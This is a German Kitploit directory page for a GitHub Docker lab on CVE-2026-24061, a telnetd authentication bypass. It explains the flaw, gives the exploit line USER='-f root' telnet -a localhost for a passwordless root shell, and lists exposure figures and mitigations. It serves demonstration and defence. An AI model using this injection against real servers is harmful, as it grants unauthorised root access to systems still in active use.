Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — Dies ist ein einfacher PoC, mit dem du die Schwere des aktuell laufenden und aktiv ausgenutzten Telnet-Bugs hervorheben kannst. Warum Leute immer noch Telnet verwenden... das entzieht sich meinem Verständnis. | Kitploit
Tools/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
Container-SicherheitSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

Dies ist ein einfacher PoC, mit dem du die Schwere des aktuell laufenden und aktiv ausgenutzten Telnet-Bugs hervorheben kannst. Warum Leute immer noch Telnet verwenden... das entzieht sich meinem Verständnis.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

CVE-2026-24061: GNU inetutils-telnetd Authentifizierungsumgehung

Ein Docker-Lab zur Demonstration von CVE-2026-24061 — eine kritische Schwachstelle zur Authentifizierungsumgehung in GNU inetutils telnetd, die 11 Jahre lang ungepatcht blieb.

Die Schwachstelle

Telnetd übergibt die Umgebungsvariable USER direkt an /usr/bin/login, ohne sie zu bereinigen. Das login-Binary besitzt ein -f-Flag, das die Authentifizierung überspringt (vorgesehen für vorab authentifizierte Sitzungen). Durch Setzen von USER='-f root' täuscht ein Angreifer login vor, Root-Zugriff ohne Passwort zu gewähren.

Betroffene Versionen: GNU inetutils 1.9.3 (März 2015) bis 2.7 CVSS-Score: 9.8 (Kritisch) Fix: Update auf inetutils 2.8+

Schnellstart

root@kitploit:~
# Image erstellen
docker build -t telnetd-exploit .

# Container ausführen (bringt dich als user1 in eine Shell)
docker run --rm -it telnetd-exploit

# Exploit — Root ohne Passwort erhalten
USER='-f root' telnet -a localhost

Du landest in einer Root-Shell. Führe whoami aus, um es zu bestätigen.

So funktioniert es

root@kitploit:~
1. Client verbindet sich mit: USER='-f root' telnet -a localhost
2. telnetd empfängt die Umgebungsvariable USER: "-f root"
3. telnetd führt aus: /usr/bin/login -f root
4. login interpretiert -f als "Authentifizierung überspringen, Benutzer ist vorab verifiziert"
5. Angreifer erhält Root-Shell — kein Passwort erforderlich

Warum -f existiert

Das -f-Flag ist legitim — es ist für Szenarien gedacht, in denen ein Benutzer bereits authentifiziert ist (z. B. aus einer vertrauenswürdigen lokalen Sitzung). Der Fehler besteht darin, dass telnetd die USER-Variable nicht bereinigt, bevor sie an login übergeben wird, sodass Remote-Angreifer das Flag injizieren können.

Auswirkungen

Stand Januar 2026:

  • ~800.000 weltweit exponierte Telnet-Server (Shadowserver)
  • ~290.000 bei Shodan indexiert
  • Schwachstelle wird aktiv in freier Wildbahn ausgenutzt (CISA-KEV-Katalog)

Warum du Telnet nicht verwenden solltest

Selbst ohne diesen Fehler überträgt Telnet alles im Klartext — einschließlich Passwörter. Verwende stattdessen SSH.

ProtokollVerschlüsselungAuthentifizierung
TelnetKeineKlartext
SSHJaSchlüssel/Passwort

Dateien

root@kitploit:~
.
├── Dockerfile              # Erstellt verwundbaren Debian-Container
├── docker-entrypoint.sh    # Startet inetd, wechselt zu user1
└── README.md

Gegenmaßnahmen

  1. Update auf GNU inetutils 2.8+
  2. Telnetd deaktivieren — Port 23 blockieren
  3. SSH verwenden — wir schreiben 2026

Referenzen

  • CVE-2026-24061
  • Original Advisory
  • CISA-KEV-Eintrag

Danksagungen

Lab basiert auf leonjza/inetutils-telnetd-auth-bypass

Tool herunterladen